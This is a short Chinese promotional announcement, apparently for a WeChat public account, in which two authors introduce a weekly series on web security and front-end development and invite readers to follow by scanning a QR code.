I have a 王松_Striker，I have a Jess_喵

带来这个分享技术的公众号~

Web安全与前端从今天开始，每周都会推送web安全以及前端的知识。

都是我们在研究和开发中的总结和经验，

希望大家能够和我们一起，

在新的一年里，

一起讨论，

一起进步，

一起创造~

web世界会因你我而变得更加美好~

请长按下方二维码关注哦~                                                                    

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开